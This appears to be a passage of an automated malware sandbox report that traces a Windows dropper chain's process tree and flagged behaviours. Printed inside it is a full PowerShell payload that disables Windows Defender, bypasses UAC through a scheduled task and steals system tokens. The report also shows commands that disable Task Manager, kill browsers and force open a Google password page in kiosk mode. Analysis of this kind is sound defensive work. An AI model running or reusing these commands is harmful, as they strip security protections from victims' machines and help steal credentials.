SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 1840 HyperServerFontdll.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 1680 whoami.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeDebugPrivilege 3644 taskkill.exe Token: SeDebugPrivilege 4440 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 2540 taskkill.exe Token: SeDebugPrivilege 2932 dwm.exe Token: SeDebugPrivilege 372 firefox.exe Token: SeDebugPrivilege 372 firefox.exe Token: SeDebugPrivilege 1480 ed4c813528.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 4752 1E05b7.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 2920 23dd480935.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 2920 23dd480935.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 372 firefox.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe 2920 23dd480935.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3644 H3tyh96.exe 372 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 528 wrote to memory of 3420 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 84 PID 528 wrote to memory of 3420 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 84 PID 528 wrote to memory of 3420 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 84 PID 3420 wrote to memory of 5108 3420 p4Y09.exe 85 PID 3420 wrote to memory of 5108 3420 p4Y09.exe 85 PID 3420 wrote to memory of 5108 3420 p4Y09.exe 85 PID 5108 wrote to memory of 4752 5108 L9O32.exe 86 PID 5108 wrote to memory of 4752 5108 L9O32.exe 86 PID 5108 wrote to memory of 4752 5108 L9O32.exe 86 PID 4752 wrote to memory of 2988 4752 1E05b7.exe 87 PID 4752 wrote to memory of 2988 4752 1E05b7.exe 87 PID 4752 wrote to memory of 2988 4752 1E05b7.exe 87 PID 5108 wrote to memory of 4756 5108 L9O32.exe 88 PID 5108 wrote to memory of 4756 5108 L9O32.exe 88 PID 5108 wrote to memory of 4756 5108 L9O32.exe 88 PID 3420 wrote to memory of 2732 3420 p4Y09.exe 90 PID 3420 wrote to memory of 2732 3420 p4Y09.exe 90 PID 3420 wrote to memory of 2732 3420 p4Y09.exe 90 PID 2988 wrote to memory of 2864 2988 skotes.exe 91 PID 2988 wrote to memory of 2864 2988 skotes.exe 91 PID 2988 wrote to memory of 2864 2988 skotes.exe 91 PID 528 wrote to memory of 1756 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 92 PID 528 wrote to memory of 1756 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 92 PID 528 wrote to memory of 1756 528 c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe 92 PID 2988 wrote to memory of 3644 2988 skotes.exe 93 PID 2988 wrote to memory of 3644 2988 skotes.exe 93 PID 2988 wrote to memory of 3644 2988 skotes.exe 93 PID 2988 wrote to memory of 2488 2988 skotes.exe 100 PID 2988 wrote to memory of 2488 2988 skotes.exe 100 PID 2988 wrote to memory of 2488 2988 skotes.exe 100 PID 2488 wrote to memory of 3000 2488 UkYEOVR.exe 101 PID 2488 wrote to memory of 3000 2488 UkYEOVR.exe 101 PID 2488 wrote to memory of 3000 2488 UkYEOVR.exe 101 PID 3644 wrote to memory of 3416 3644 H3tyh96.exe 104 PID 3644 wrote to memory of 3416 3644 H3tyh96.exe 104 PID 3644 wrote to memory of 3416 3644 H3tyh96.exe 104 PID 2988 wrote to memory of 1208 2988 skotes.exe 106 PID 2988 wrote to memory of 1208 2988 skotes.exe 106 PID 2988 wrote to memory of 1208 2988 skotes.exe 106 PID 3416 wrote to memory of 4664 3416 powershell.exe 113 PID 3416 wrote to memory of 4664 3416 powershell.exe 113 PID 3416 wrote to memory of 4664 3416 powershell.exe 113 PID 3416 wrote to memory of 3380 3416 powershell.exe 114 PID 3416 wrote to memory of 3380 3416 powershell.exe 114 PID 3416 wrote to memory of 3380 3416 powershell.exe 114 PID 2988 wrote to memory of 1576 2988 skotes.exe 116 PID 2988 wrote to memory of 1576 2988 skotes.exe 116 PID 2988 wrote to memory of 1576 2988 skotes.exe 116 PID 3416 wrote to memory of 4460 3416 powershell.exe 117 PID 3416 wrote to memory of 4460 3416 powershell.exe 117 PID 3416 wrote to memory of 4460 3416 powershell.exe 117 PID 3416 wrote to memory of 372 3416 powershell.exe 118 PID 3416 wrote to memory of 372 3416 powershell.exe 118 PID 3416 wrote to memory of 372 3416 powershell.exe 118 PID 3416 wrote to memory of 1044 3416 powershell.exe 119 PID 3416 wrote to memory of 1044 3416 powershell.exe 119 PID 3416 wrote to memory of 1044 3416 powershell.exe 119 PID 3000 wrote to memory of 4500 3000 WScript.exe 121 PID 3000 wrote to memory of 4500 3000 WScript.exe 121 PID 3000 wrote to memory of 4500 3000 WScript.exe 121 PID 4500 wrote to memory of 3420 4500 cmd.exe 123 PID 4500 wrote to memory of 3420 4500 cmd.exe 123 PID 4500 wrote to memory of 3420 4500 cmd.exe 123 PID 1044 wrote to memory of 2912 1044 powershell.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe"C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend8⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"8⤵
- System Location Discovery: System Language Discovery
PID:3380
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller8⤵
- System Location Discovery: System Language Discovery
PID:372
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 31567⤵
- Program crash
PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f9⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3420
-
-
C:\dllnet\HyperServerFontdll.exe"C:\dllnet/HyperServerFontdll.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JPslVFqVhp.bat"10⤵PID:2296
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:3880
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:4444
-
-
C:\Program Files\Microsoft Office 15\ClientX64\dwm.exe"C:\Program Files\Microsoft Office 15\ClientX64\dwm.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013730001\3cf7ddfd1d.exe"C:\Users\Admin\AppData\Local\Temp\1013730001\3cf7ddfd1d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 15327⤵
- Program crash
PID:6360
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013731001\282c8bec95.exe"C:\Users\Admin\AppData\Local\Temp\1013731001\282c8bec95.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\1013732001\35042eaba5.exe"C:\Users\Admin\AppData\Local\Temp\1013732001\35042eaba5.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
-
C:\Users\Admin\AppData\Local\Temp\1013733001\23dd480935.exe"C:\Users\Admin\AppData\Local\Temp\1013733001\23dd480935.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2920 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2556
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:372 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2072 -parentBuildID 20240401114208 -prefsHandle 1996 -prefMapHandle 1988 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd4b486a-994e-4c77-98d2-02c16491dd1a} 372 "\\.\pipe\gecko-crash-server-pipe.372" gpu9⤵PID:2320
-
-
